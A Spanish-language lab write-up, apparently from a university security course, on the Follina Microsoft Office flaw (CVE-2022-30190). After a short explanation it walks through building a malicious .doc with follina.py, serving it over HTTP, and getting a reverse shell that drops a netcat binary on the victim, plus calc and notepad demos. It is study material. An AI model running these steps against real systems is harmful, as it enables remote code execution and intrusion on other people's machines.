Follina (CVE-2022-30190) es una vulnerabilidad de día cero de Microsoft Office descubierta recientemente. Es una vulnerabilidad de alta gravedad que los hackers pueden aprovechar para lanzar ataques de ejecución remota de código (RCE).
Amine TITROFINE | 17 de diciembre de 2022
Follina (CVE-2022-30190) es una vulnerabilidad de día cero de Microsoft Office descubierta recientemente. Es una vulnerabilidad de alta gravedad que los atacantes pueden aprovechar para ejecutar código remoto (RCE). Se produce cuando se llama a MSDT mediante el protocolo URL desde una aplicación que lo invoca, como Word. Un atacante que explote esta vulnerabilidad con éxito puede ejecutar código arbitrario con los privilegios de la aplicación que lo llama. El atacante puede entonces instalar programas, ver, cambiar o eliminar datos, o crear nuevas cuentas en el contexto permitido por los derechos del usuario.
2 máquinas virtuales :
$ git clone https://gitlab.com/grenoble-inp-ensimag/Secu3A/Devoir1/CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri.git
$ cd CVE_2022_30190_amine_titrofine_farah_ben_youssef_walid_lanjri
$ python3 follina.py –r 9999
Después de ejecutar el programa follina.py, aparecerá un ( follina.doc ) que contiene un script malicioso.
Para facilitar el intercambio de archivos entre las dos máquinas virtuales, usaremos el servidor HTTP de Python.
$ python3 –m http.server 8080
Obtén una reverse shell en el puerto 9999. Nota: esto descarga un binario de netcat en la víctima y lo coloca en C:\Windows\Tasks. No elimina el binario. Esto activará las detecciones del antivirus a menos que el antivirus esté deshabilitado.
$ python3 follina.py -r 9999
Abrir calc.exe:
$ python3 follina.py -c "calc"
[+] copied staging doc /tmp/9mcvbrwo
[+] created maldoc ./follina.doc
[+] serving html payload on :8000
Abrir notepad.exe:
$ python3 follina.py -c "notepad"